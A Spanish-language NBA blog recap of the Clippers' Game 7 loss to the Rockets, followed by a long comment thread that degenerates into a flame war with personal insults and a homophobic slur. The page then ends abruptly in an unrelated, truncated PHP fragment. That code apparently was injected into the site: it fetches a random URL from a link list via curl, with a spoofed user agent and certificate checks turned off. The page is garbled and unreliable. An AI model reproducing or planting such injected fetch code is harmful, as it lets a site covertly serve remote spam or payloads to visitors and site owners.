La Crónica: Los Warriors ya tienen rival

18 de May de 2015 por txusma

Stephen Curry vs James Harden. “El duelo” está servido y en el mejor escenario posible: las finales de conferencia de un Oeste más salvaje que nunca. Unos Clippers todavía tocados anímicamente por la derrota del otro día fueron incapaces de concretar las pocas oportunidades que tuvieron de meterse de verdad en el partido y la victoria acabó cayendo prácticamente por su propio peso del lado local.

LA Clippers 100 – Houston Rockets 113

No era fácil recuperarse de un golpe como el que sufrieron los Clippers hace 3 días cuando Josh Smith y Corey Brewer les remontaron 19 puntos en el último cuarto del sexto partido. No era fácil y en efecto, no lo consiguieron. Los Clippers no fueron capaces de ponerse por delante en el marcado en ningún momento del partido y se dedicaron a hacer la goma durante buena parte del mismo. James Harden empezó entonadísimo y los locales acabaron el primer cuarto con 7 puntos de ventaja que se conviertieron en una montaña imposible de escalar para unos rivales que no parecían estar del todo en el partido. En el segundo cuarto se mantuvieron las diferencias pero los Clippers no dieron muestras reales de estar vivos hasta el tercer cuarto en el que fueron capaces de ponerse a 3 puntos y meter algo de miedo en el cuerpo de los aficionados tejanos. Fue un espejismo. En apenas 2 minutos la diferencia volvía a ser de 9 puntos y cuando los Clippers intentaban volver a reducir las diferencias se encontraron ante un Pablo Prigioni excelente en varias acciones puntuales. Para cerrar el cuarto James Harden rompió los tobillos de Austin Rivers (lamentable partido el suyo) y puso los 17 puntos arriba a los Rockets. A falta de 5 minutos los locales seguían 18 puntos por delante y en ese momento Chris Paul debió de darse cuenta de que se le estaba escapando entre las manos la posibilidad de ser finalista de conferencia por primera vez en su carrera porque comandó un furioso parcial de 11-1 que dejó a los suyos a escasos 8 puntos a falta de 2 minutos para el final. Los nervios se instalaron en el Toyota Center hasta que Trevor Ariza (6 de 12 en T3) anotó un triple que otorgaba a los suyos 11 puntos de ventaja definitivos. Ahora sí, los Rockets volvían a las finales de conferencia 18 años después. En cambio, los Clippers se quedaban a las puertas de alcanzarlas por primera vez en la historia. Tal vez de una manera cruel, incluso para ellos.

Comenta

43 comentarios a esta entrada

  1. Azabel dice:
    #1

    ahora jajaja el que rie ultimo rie mejor no?

    muy oportunista quien en esta pagina se refirio a mi cuando parecia que los Clippers finalmente llegarian a algo y Griffin pasaria una segunda ronda por primera vez en su carrera

    bueno ahora me acuerdo de el, y de hecho, si revisamos mis comentarios el otro día, les dije vamos a ver como termina…

    no hay Vinny Del Negro a quien culpar por segundo años consecutivo

      Citar

  2. Schize dice:
    #2

    Fui yo el que se acordó de ti, pero después de una gran temporada y enormes playoffs de Griffin, y eso ni tú ni nadie se lo vais a poder quitar. Si Blake hubiera jugado anoche un partido lamentable, o simplemente flojo, aún podrías argumentar un poco tu opinión, pero es que ni siquiera es el caso. Si tú quieres seguir tu guerra contra Blake Griffin, al cual claramente le tienes puesta la cruz, y quieres seguir culpándolo de todos los pinchazos de los Clippers, pues oye chico, ánimo.

      Citar

  3. jmpa dice:
    #3

    El banquillo es la clave, amigo mío.
    No parece que sean tan malos Glen Davis o Hawes, como para dar 10-15 min de descanso a la pareja de interiores.

    Ya en la eliminatoria anterior, en los partidos igualados, apenas jugaban 6 jugadores y el resto 5-6 minutos a lo sumo.
    En fin, no seré yo quien de lecciones a Doc Rivers, todo un campeón de la NBA. Además no tengo ni idea de como está el equipo más allá de lo que veo en los partidos y/o resúmenes, pero un equipo sin un banquillo solvente es difícil que llegue lejos en el salvaje oeste.

      Citar

  4. Ruxixón dice:
    #4

    EPIC FAIL,definición de los Clippers tras el 3-1,con Chris Paul recuperado para la causa llevándose los 2 del Staples.Inexplicable como se han derrumbado.A seguir aguantando al Harden de mírame y no me toques…a tope con los Warriors!

    La postemporada de Griffin es espectacular se mire como se mire,y no se le puede culpar de la derrota en la serie ante Houston.Que no es un tio de clutch al nivel de Durant a la hora de cerrar partidos es obvio,es uno de sus pocos peros a estas alturas,pero vamos,que es un jugador espectacular y no sólo por sus highlights.Por cierto,esto es del imaginario de Ramona Shelburne en ESPN,que escribió un artículo sobre el futuro del equipo angelino.Nada serio/oficial,viene a decir que Blake Griffin -que es de Oklahoma- a los Thunder por Kevin Durant es un trade “soñado” por bastantes del mundillo.

      Citar

  5. TheDeerHunter dice:
    #5

    Azabel:
    ahorajajaja el que rie ultimo rie mejor no?

    muy oportunista quien en esta pagina se refirio a mi cuando parecia que los Clippers finalmente llegarian a algo y Griffin pasaria una segunda ronda por primera vez en su carrera

    Me parto contigo lo digo en serio. Lo único malo es lo predecible q te has vuelto.
    La crisis llega hasta el nivel de los troleos. Q lastimica.

      Citar

  6. TheDeerHunter dice:
    #6

    Habrá tiempo para analizarlo pero el q sale de esto verdaderamente señalado es el viejo Doc.
    El hijisimo como único base suplente para cp3 es de lo más subrealista q hayamos visto.

      Citar

  7. Azabel dice:
    #7

    TheDeerHunter: Me parto contigo lo digo en serio.Lo único malo es lo predecible q te has vuelto.
    La crisis llega hasta el nivel de los troleos. Q lastimica.

    jajajajajajajaja q comerla decimos en argentina,

    hablar antes nunca es bueno, hablaron a pedo tu y ese schize y ahora a comerse sus palabras, otro fracason de lls Clippers se lo mira por donde se lo mire

    ojo q fue ese schize quien de la nada volvio a mencionarme luego de un buen partio de griffin (no como el de anoche), bueno nel se acordo de mi y yo eahora me acuerd de el ajjaja tu te sumaste como un chorlito, ahora como les dije, a comerla, otra vez sera, desde mi analisis de griffin el chico a mejorado muchisimo, pero sigue donde lo puse yo, una segunda estada, pero no apta para llevarte a un titulo, pasaron dos años de ello, y aun no ha logrado pasar de segunda ronda de PO, jaque mate

    chapeu

      Citar

  8. Azabel dice:
    #8

    Schize:
    Fui yo el que se acordó de ti, pero después de una gran temporada y enormes playoffs de Griffin, y eso ni tú ni nadie se lo vais a poder quitar. Si Blake hubiera jugado anoche un partido lamentable, o simplemente flojo, aún podrías argumentar un poco tu opinión, pero es que ni siquiera es el caso. Si tú quieres seguir tu guerra contra Blake Griffin, al cual claramente le tienes puesta la cruz, y quieres seguir culpándolo de todos los pinchazos de los Clippers, pues oye chico, ánimo.

    jajajajajajajajaja gracias por darme nueva vida en el Blog, habia dejado de comentar, pero me nombraste y renaci para poder burlarme de ti jajaja gracias!!!

      Citar

  9. Triceratops dice:
    #9

    Mas que los Warriors tienen rival, yo diria que no tienen. Son claramente superiores al resto de los que quedan por plantilla, dinamica y sensaciones. Cualquier cosa que sea que los GSW no se llevasen el anillo, para mi sería una sorpresa mayúscula.

      Citar

  10. Triceratops dice:
    #10

    TheDeerHunter:
    Habrá tiempo para analizarlo pero el q sale de esto verdaderamente señalado es el viejo Doc.
    El hijisimo como único base suplente para cp3 es de lo más subrealista q hayamos visto.

    Bueno, yo creo que Austin Rivers lo ha hecho bastante bien. De hecho, creo que ha dejado de ser conocido simplemente por ser el hijo de…a hacerlo por su juego; es decir, ha pasado de ser un jugador marginal y de relleno a entrar en la rotación de un cuasi finalista de conferencia y asumir bastante protagonismo.

    PD: Azabel, no escribas desde el movil ó utiliza un corrector. Gracias. Ah….y el debate de Blake Griffin me aburre, por cierto.

      Citar

  11. Schize dice:
    #11

    Azabel: jajajajajajajajaja gracias por darme nueva vida en el Blog, habia dejado de comentar, pero me nombraste y renaci para poder burlarme de ti jajaja gracias!!!

    Pues que quieres que te diga, no me siento ofendido. Antes has puesto que en tu post de Griffin lo considerabas un segunda espada, cuando creo recordar que en el post hablabas de él como alguien que no llegaría a tener nivel de segunda espada en un equipo contender (si esto no es cierto, fallo mío de memoria. Estudiar es lo que tiene, mata las neuronas útiles y no te deja tiempo para rebuscar viejos posts). Yo opino que el nivel que decías que jamás alcanzaría ya lo ha dado. Después de eliminar a los Spurs pocos negarían su condición de claros contender al anillo y con Blake prácticamente de primera espada.

    De todas maneras, a parte de esto, Griffin ha hecho unos playoffs increíbles y por los comentarios que veo en el blog no soy el único que piensa así. Si tú no quieres verlo, no lo veas. Esto es un deporte de equipo, no ha perdido la eliminatoria Griffin, sino todo un equipo que se ha hundido después de un 3-1 a favor y de tener la eliminatoria ganada en el sexto partido. Poco se le podrá achacar a un solo jugador de esto.

    Pero oye, de nada por haberte dado de nuevo ánimos de comentar. Soy de los que de vez en cuando disfrutan dándote caña, pero se agradece que haya opiniones contrarias y debate. Para algo es un blog. Eso si, siempre desde el respeto, y eso es algo que no tienes muy trabajado. Al menos hoy.

      Citar

  12. Txusma dice:
    #12

    A ver si lo entiendo. Así simple: Si los Clippers llegan a la final d conferencia Griffin es bueno y si no llegan Griffin es malo. Me he perdido algún comentario más elaborado?

      Citar

  13. Azabel dice:
    #13

    Schize:
    Pero oye, de nada por haberte dado de nuevo ánimos de comentar. Soy de los que de vez en cuando disfrutan dándote caña, pero se agradece que haya opiniones contrarias y debate. Para algo es un blog. Eso si, siempre desde el respeto, y eso es algo que no tienes muy trabajado. Al menos hoy.

    pues creo recordar, que de la nada, y despues de dos años de mi famoso “analisis” pediste que debia reconocer que staba equivocado, como si lo hubiese escrito ayer

    entonces, si tienes tan presente mi analisis, al menos espera a que termine la temporada para pincharme, pues puede pasarte como aqui

    repito, quien volvio a poner sobre la mesa mi analisis fuiste tu, por que? bueno, quiza estuviste dos años esperando a regañadientes que los Clippers finalmente cubran las expectativas, y cuando creiste que ya era un hecho, te desahoaste de dos años contenidos

    bueno malas noticias, han vuelto a defraudar, y con Rovers de entrenador, la elimaoria 3-1 su favor, y sin lesionados, dato muy revelador

    entonces, la cosa es asi, lo que escribi fue hace dos años y no me parece tan errado de la realidad amen de la mejora de Griffin, si cada año va a llegar el momento de recordarlo, bueno q se la coma quien tiene tantas ganas, LA TENES ADENTRO diria Maradona

    en ese caso, nunca podriamos escribir nada de nada que en el futuro las cosas pueden cambiar, yo vi en aquel momento que Griffin se desinflaba muchisimo despues de lo que prometio en su año rookie, de hecho, este año ni ha estado en las quinielas del MVP cuando era un jugador llamado a dominar la liga

    dije que debia venir a jugar de tercer extranjero a la argentina? o que su lugar era el Caja Laboral? no nunca, solo vi su justa dimension segun mi criterio

    ha mejorado? absolutamente, pero sigue sin ser lo que prometia, sigue sin estar a la altura de una leyenda de la liga (por sus volcadas tiene mas cartel, que aldrigue pero esta en ese nivel),

    entonces si alguno ha quedado tocado por aquel analisis, como digo, de hace dos años, bueno espero que algun dia pueda ganar la liga Griffin y vengan aquí felicies, mientras tanto a comerla

      Citar

  14. Azabel dice:
    #14

    Triceratops: laramente superiores al resto de los que quedan por plantilla, dinamica y sensaciones. Cu

    ahora un tema que me parece, no han queado pesos pesados de la pintura entre los 4 equipos, lo que creo favorece claramente a los mermados Cavs

    Milsap es un extraordinario 4, pero tiene fisico de 3, Green de hecho es 3, y bueno, Jones y Smith podrian complicar el juego interior de los cavs en una eventual final de conferencia

    pero todos estos, me parecen mas livianos que la dupla Griffin/ Jordan, Zach/Gasolo la propia dupla interna de los Bulls, y hasta Nene/Gortat

    en varios pasajes de varios juegos los cavs copntra estos rivales podrian ubicar a Lebron de 4 y Shumpert de 3, cosa que seria impensada frente a rivales de mayor porte

      Citar

  15. Schize dice:
    #15

    Azabel: pues creo recordar, que de la nada, y despues de dos años de mi famoso “analisis” pediste que debia reconocer que staba equivocado, como si lo hubiese escrito ayer

    entonces, si tienes tan presente mi analisis, al menos espera a que termine la temporada para pincharme, pues puede pasarte como aqui

    repito, quien volvio a poner sobre la mesa mi analisis fuiste tu, por que? bueno, quiza estuviste dos años esperando a regañadientes que los Clippers finalmente cubran las expectativas, y cuando creiste que ya era un hecho, te desahoaste de dos años contenidos

    bueno malas noticias, han vuelto a defraudar, y con Rovers de entrenador, la elimaoria 3-1 su favor, y sin lesionados, dato muy revelador

    entonces, la cosa es asi, lo que escribi fue hace dos años y no me parece tan errado de la realidad amen de la mejora de Griffin, si cada año va a llegar el momento de recordarlo, bueno q se la coma quien tiene tantas ganas, LA TENES ADENTRO diria Maradona

    en ese caso, nunca podriamos escribir nada de nada que en el futuro las cosas pueden cambiar, yo vi en aquel momento que Griffin se desinflaba muchisimo despues de lo que prometio en su año rookie, de hecho, este año ni ha estado en las quinielas del MVP cuando era un jugador llamado a dominar la liga

    dije que debia venir a jugar de tercer extranjero a la argentina? o que su lugar era el Caja Laboral? no nunca, solo vi su justa dimension segun mi criterio

    ha mejorado? absolutamente, pero sigue sin ser lo que prometia, sigue sin estar a la altura de una leyenda de la liga (por sus volcadas tiene mas cartel, que aldrigue pero esta en ese nivel),

    entonces si alguno ha quedado tocado por aquel analisis, como digo, de hace dos años, bueno espero que algun dia pueda ganar la liga Griffin y vengan aquí felicies, mientras tanto a comerla

    Jejeje me hace gracia que pienses que me importa tanto la opinión que tuvieras o tengas de Griffin. He de decirte que me ha hecho gracia imaginarme en lo más oscuro de mi habitación planeando mi malvado post para cuando Griffin cumpliera las expectativas.

    En fin, tengo intención de que este sea mi último post hablando del tema, y más estando tan claro que ni tú ni yo vamos a darle nada de razón al otro. Lo primero, sobre los 2 años que han pasado: da igual. A fin de cuentas en tu post hablaste de Griffin como si jamás fuera a dar el nivel de segunda espada de un equipo contender (no leyenda del basket mundial ni nada que se le parezca), así que podrían haber pasado 5 o 10 años. El tema es el nivel que ha alcanzado el chaval (siendo joven y teniendo margen de mejora aún)
    Segundo: el hecho de que los Clippers hayan defraudado y tirado la eliminatoria es intrascendente en el tema Griffin. La cosa era el nivel individual y la incidencia en el juego que podría haber dado, y creo que no hace falta hacer más hincapié en eso (si tú sigues queriendo verlo como que ha jugado de una manera mediocre y los Clippers se han quedado donde se han quedado por su culpa, oye, es tu opinión. No la comparto). Yo hice mi comentario después de un partido enorme de Griffin y de haber sido la razón número 1 (o 2, después de Paul) de cargarse a los vigentes campeones (que no son un equipo cualquiera), lo cual ya me parece un logro importante.
    Y por último: te repito lo del respeto. Esto no es el foro de fútbol del Marca.com. Cuando aprendas a respetar a la gente, aunque no compartan tu punto de vista, y puedas evitar decir sandeces que no aportan nada (aunque las diga tu Maradona), tu opinión será mucho mejor valorada.

    PD: no se si había quedado pero no, no soy de los Clippers y su eliminación, más allá de que Harden y Howard me caigan, me da igual totalmente. Y Griffin también me da igual. No es mi hermano ni mi amigo.

      Citar

  16. TheDeerHunter dice:
    #16

    Azabel: jajajajajajajaja q comerla decimos en argentina,

    hablar antes nunca es bueno, hablaron a pedo tu y ese schize y ahora a comerse sus palabras, otro fracason de lls Clippers se lo mira por donde se lo mire

    ojo q fue ese schize quien de la nada volvio a mencionarme luego de un buen partio de griffin (no como el de anoche), bueno nel se acordo de mi y yo eahora me acuerd de el ajjaja tu te sumaste como un chorlito, ahora como les dije, a comerla, otra vez sera, desde mi analisis de griffin el chico a mejorado muchisimo, pero sigue donde lo puse yo, una segunda estada, pero no apta para llevarte a un titulo, pasaron dos años de ello, y aun no ha logrado pasar de segunda ronda de PO, jaque mate

    chapeu

    Justo me has recordado una frase que te viene clavada:

    “No juegues nunca al ajedrez contra una paloma. No importa lo bien que juegues que ella se cagará en el tablero y se pavoneará como si hubiera ganado”. XD XD XD

    Qué nivel de comentarios… palomito.

      Citar

  17. Azabel dice:
    #17

    Schize: Jejeje me hace gracia que pienses que me importa tanto la opinión que tuvieras o tengas de Griffin. He de decirte que me ha hecho gracia imaginarme en lo más oscuro de mi habitación planeando mi malvado post para cuando Griffin cumpliera las expectativas.

    es lo que parecio Bro, te la jugaste y perdiste, intentaste ser oportunista y erraste en la oportunidad,

    en cuanto a sandeses y demas, quieres que despues de que te acordaste especificamente de mi luego de un partido de griffin, cuando le erras duro y te tengo a tiro, te la voy a dejar pasar? otra vez cantaras victoria chaval

    en cuanto a que a Griffin no llegaria a ser segunda espada de un equipo contender, es segunda espada de un equipo contender y no mucho mas,

    que no salgan campeones no significa que el tio no sirva, pero el hecho de que no puedan avanzar de segunda ronda, cuando su equipo tiene a CP3, trajeron a Rivers, y tienen a Crawford, Jordan y Reddick, es un dato, algo no anda bien

    quiza no anda bien CP3, quiza eno es Griffin el problema, pero un problema hay

    a Paul se le pasan los años, hace 4 llego como el mejor base de la liga de modo indicutido (la NBA veto un traspaso por el!!!!), y ha perdido ese rol especifico
    los años no le pasan en vano a Crawford
    Griffin ha dejado de ser el 4 del oeste en mano de Davis
    y Doc Rivers, pierde demasiado del credito que tenia bien ganado luego de que se le escapace esta eliminatoria

    la responsabilidad de Griffin? obviamente no es el culpable de la eliminación, pero dios, alguien vio su ultimo cuarto? alguien realmente osa ponerlo al nivel de Lebron que decide todas u cada una de las jugadas de su equipo? le queda muchisimo camino por recorrer…

      Citar

  18. Azabel dice:
    #18

    hablandoi de Clippers, los veo en una complicada situacion economica para el proximo año, estan en 68 millones sin posibilidades de rebajas (se haran uso de las opciones por Barnes y Crawford), y sin De Andre Jordan que se va a pedir unos 12 millones como nada

      Citar

  19. gastón dice:
    #19

    Hola a todos, recuerdo comentar a principio de temporada un post en el cual hubo polemica con Griffin, que esta era su temporada de demostrar que no era un simple jugador de machaques y jugadas de top 10, creo que lo ha hecho. Ha demostrado ser un gran jugador, ha evolucionado y eso merece ser reconocido. Un saludo a todos

      Citar

  20. Azabel dice:
    #20

    Bater: Blake Griffin. Griffin te puede dar 27 puntos y 11 rebotes como en el juego del domingo que se ven genial en los papeles, pero no pudo lidiar con la presión en los últimos 12 minutos del sexto juego ni elevó al nivel de su equipo en el séptimo. Él tampoco supo lidiar con la marca de Trevor Ariza, un jugador más pequeño que él. Su porcentaje de efectividad en tiros de campo durante el último cuarto en los playoffs merodeó al 30 por ciento y sus 11 puntos en el periodo final del séptimo juego de la serie contra Houston generaron una remontada fantasma que enmascaró un +/- de -12 en el encuentro (tercer peor de los Clippers).

    ver 5-5 en espn, la decepciones de segunda ronda

      Citar

  21. Vader dice:
    #21

    Veo que en canal plus no dan el sorteo de hoy del draft… alguien sabe como seguirlo en directo??

    Gracias de antemano, saludos!!

      Citar

  22. Azabel dice:
    #22

    TheDeerHunter: Justo me has recordado una frase que te viene clavada:

    “No juegues nunca al ajedrez contra una paloma. No importa lo bien que juegues que ella se cagará en el tablero y se pavoneará como si hubiera ganado”. XD XD XD

    Qué nivel de comentarios… palomito.

    eso me hace acordar a un dicho que cualquier marica insulta atras de su pc, bien de cagon y creo que te pinta de cuerpo entero, nerd

      Citar

  23. Romino dice:
    #23

    Se me ha caído un mito. Azabel que te pierdes!!!!

      Citar

  24. Schize dice:
    #24

    Pasando por alto ciertos comentarios que es mejor ignorar, una pregunta que tengo para los enterados:
    He leído en el Marca (no me fio un pelo) dos cosas acerca de los Clippers. La primera que hay muy mala relación entre CP3 y DeAndre por tema ética de trabajo del segundo. La segunda que los Clippers han intentado renovar al pivot por 100 kilos 5 años. ¿Se ha hablado algo de esto en los medios americanos? La oferta me parece un disparate (y más si es cierta la mala relación con el jugador franquicia del equipo)

      Citar

  25. Jose Luis dice:
    #25

    100 kilos? están locos

    50-60 está bien…

      Citar

  26. TheDeerHunter dice:
    #26

    Azabel: eso me hace acordar a un dicho que cualquier marica insulta atras de su pc, bien de cagon y creo que te pinta de cuerpo entero, nerd

    Es gracioso que digas eso, cuando el que siempre insulta y falta al respeto del personal eres tú, desde “atrás de su pc” casualmente… pero claro tampoco se pueden pedir peras al olmo.

    El próximo insulto hacia mi o hacia cualquiera… habrá tijera. Y si la cosa persiste todos tendrán la suerte de dejar de leer para siempre tus exabruptos en este sagrado blog.
    Mueve ficha palomita.

      Citar

  27. Azabel dice:
    #27

    bueno, prefiero que me censuren, total anda flojo de comentarios la cosa de no ser por mi jajaja

    gordo nerd, suerte con tu pagina de internet, ojala algun dia conozcas una mujer y vuelvas al mundo real jeropa jajaja

      Citar

  28. Azabel dice:
    #28

    por tios como tu, este blog, paso dos semanas sin comentarios y jornadas de nba tras jornada con uno o dos, tu y dos o tres mas se creen los dueños de la verdad por ser administradores, se dan el gusto de censurar comentarios cuando le marcan sus errores

    una pena, este blog supo tener mucha vida hace tres y dos años, verlo esta ultima temporada da pena, por que algunos tios aqui valen la pena, por desgracia no todos

      Citar

  29. Azabel dice:
    #29

    me muevo a nbamaniacs, alli si hay vida

    te gusto mi movida palomita? jajajaja

      Citar

  30. Azabel dice:
    #30

    TheDeerHunter: Y si la cosa persiste todos tendrán la suerte de dejar de leer para siempre tus exabruptos en este sagrado blog.

    “todos”? te refieres a ti y dos mas no? no veo a nadie mas comentado jejeje

      Citar

  31. txusma dice:
    #31

    Azabel:
    me muevo a nbamaniacs, alli si hay vida

    te gusto mi movida palomita? jajajaja

    Triste y decepcionado… 7 años currando para que ahora lleguen y se rían de mí y de los que han ido colaborando todo este tiempo.

    Me alegro de que a la gente de nbamaniacs le vaya tan bien. Espero que te reciban con los brazos abiertos como hicimos nosotros en su momento y que tengan la paciencia que creo hemos demostrado siempre.

      Citar

  32. charlestone dice:
    #32

    Yo, sempiterno ojeador de este blog, mi blog de cabecera, os agradezco de verdad todo el esfuerzo que hacéis. Aunque no haga comentarios a menudo, lo dejo a los que sabéis, os pido no desfallecer…y mucho menos cuando las críticas provienen de niños embadurnados de acné (con todo el respeto a los que lo sufren con dignidad). Mi novia e incluso la nena que viene en camino sufren de mi adicción a la NBA y a este blog…y espero que así sea durante el máximo tiempo posible.

    Mil gracias y go ahead!!

      Citar

  33. Josgel dice:
    #33

    Toda la razon charlestone, me veo reflejado en tu comentario aunque con 40 tacos y dos niñas ya.

      Citar

  34. Vader dice:
    #34

    Este blog de NBA es imprescindible y tiene un sabor y estilos únicos en la red. Una cosa son las páginas de noticias más o menos al uso pero en TJNBA sabes que cada día tienes uno o más artículos con la actualidad de la NBA que estan trabajados y hechos a conciencia, no son noticias directamente traducidas de fuentes americanas, lo cual es muy respetable y seguramente necesario pero aquí estamos hablando de otra cosa.

    Mil gracias a los que lo haceis posible y no hagais caso a los trolls.

    Saludos a todos

      Citar

  35. Larry Bird 33 dice:
    #35

    Me sumo a Vadel, Josgel y charlestone, mil gracias por todo ya que aunque comento poco leo cada día el blog y vuestros comentarios (de los que tenéis educación obviamente). Seguid así y gracias una vez más por todo.

      Citar

  36. Couxela dice:
    #36

    Otro que os sigue a diario aunque apenas comente.
    Todo mi apoyo y muchas gracias por vuestro trabajo. Para mí sois es el mejor blog de basket en castellano que conozco.

      Citar

  37. Blade Petrovic dice:
    #37

    Me sumo a todos. El trabajo de Deer, Txus, Magic, Viva, Denise nose si me dejo a alguien es de lo mejor. Blog de referencia donde se respira NBA. Pocos blogs siguen como este que viene desde aquellos Bucks de Villanueva, Redd y Bogut. Espero que este episodio no influya al blog. Solo me queda decir gracias y que esto nos dure

      Citar

  38. oli dice:
    #38

    Yo también os mando mi apoyo, este blog de verdad es diferente y se nota que os lo tomáis con mucha pasion, ánimos y muchas gracias mientras dure esto que espero que sean muchos años.

      Citar

  39. Azabel dice:
    #39

    txusma: Triste y decepcionado… 7 años currando para que ahora lleguen y se rían de mí y de los que han ido colaborando todo este tiempo.

    Me alegro de que a la gente de nbamaniacs le vaya tan bien. Espero que te reciban con los brazos abiertos como hicimos nosotros en su momento y que tengan la paciencia que creo hemos demostrado siempre.

    ultimo comentario que realizo (mi genio es mas fuerte que yo y debí pasar a ver reacciones), no es contigo el tema txusma que independientemente de no compartir mis opiniones siempre te la aguantaste, lo propio ha hecho el bueno de Schize, quien se tuvo q comer las gastadas propias de no esconder la mano cuando se tira la piedra,

    ahora al palomito, amenzarme con “tijera”, con censurarme? con expulsarme del blog? pero por dios chaval quien te crees que eres, el administrador de google???? una pena pero gente asi, con ese ego, arrastra a la gente decente

      Citar

  40. TheDeerHunter dice:
    #40

    Azabel:
    ahora al palomito, amenzarme con “tijera”, con censurarme? con expulsarme del blog? pero por dios chaval quien te crees que eres, el administrador de google???? una pena pero gente asi, con ese ego, arrastra a la gente decente

    El administrador de google no, pero casualmente sí de este sitio.
    Aquí no se censura a nadie y a ti en concreto se te han permitido más excesos que a nadie. Hay que seguir unas reglas básicas de conducta y educación que obviamente no tienes. Intenta de las tuyas en nbamaniacs a ver cómo se lo toman ellos.

    Y con todo nadie te ha dicho que te pires, sólo que te comportes… mucho pedir. Sin embargo, yo, al contrario que Txus… ni decepcionado, porque lo veía venir desde el principio, ni mucho menos triste.
    Para que alguien se ría de alguien tiene que alcanzar un nivel. Me gustaría decirte que has sido el trol más original e ingenioso que ha pisado este blog pero te estaría mintiendo. Más suerte en nbamaniacs…

    La grasa que nos sobra…

      Citar

  41. AndiD dice:
    #41

    Otro por aquí que se suma a los apoyos del blog. No hay nada igual en la red y da gusto entrar cada día a leer las crónicas y los comentarios.
    Ahora que los bucks molan, propongo cambio de nick the Deer… TheTrollHunter 🙂
    Saludos!

      Citar

  42. Anon dice:
    #42

    El enésimo que se suma para apoyar a este gran blog y felicitar a todos por hacerlo funcionar durante tanto tiempo. Se echan de menos debates de antaño pero entiendo que mantenerse activos durante tanto tiempo es muy complicado, aún así disfruto con cada aporte enormemente.
    Llevo leyendo esto unos 3-4 años y si no comento es porque prefiero leer a los maestros de la nba que habitan aquí, espero que faltas de respeto y comentarios de esa índole no se vuelvan a repetir, me duele verlos en está pagina que considero casi un templo del culto a la nba.

      Citar

  43. dunc dice:
    #43

    Yo os leo absolutamente todos los días. Desde que llego a la oficina actualizo cada 10 minutos a ver si publicais la crónica, jejeje.

    ¡Animo!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>